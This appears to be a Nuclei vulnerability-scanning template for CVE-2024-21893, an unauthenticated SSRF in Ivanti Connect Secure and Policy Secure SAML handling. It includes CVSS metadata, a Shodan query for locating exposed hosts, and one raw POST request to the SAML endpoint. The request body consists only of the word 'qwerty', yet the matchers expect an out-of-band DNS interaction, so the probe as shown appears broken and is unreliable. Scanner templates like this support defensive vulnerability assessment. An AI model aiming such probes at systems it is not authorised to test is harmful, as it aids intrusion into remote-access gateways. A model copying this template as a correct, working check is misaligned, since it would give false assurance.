id: CVE-2024-21893 info: name: Ivanti SAML - Server Side Request Forgery (SSRF) author: DhiyaneshDk severity: high description: | A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. reference: - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2024-21893 cwe-id: CWE-918 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* metadata: vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" max-request: 1 tags: cve,cve2024,kev,ssrf,ivanti http: - raw: - | POST /dana-ws/saml20.ws HTTP/1.1 Host: {{Hostname}} qwerty matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - '/dana-na/' - 'WriteCSS' condition: and # digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950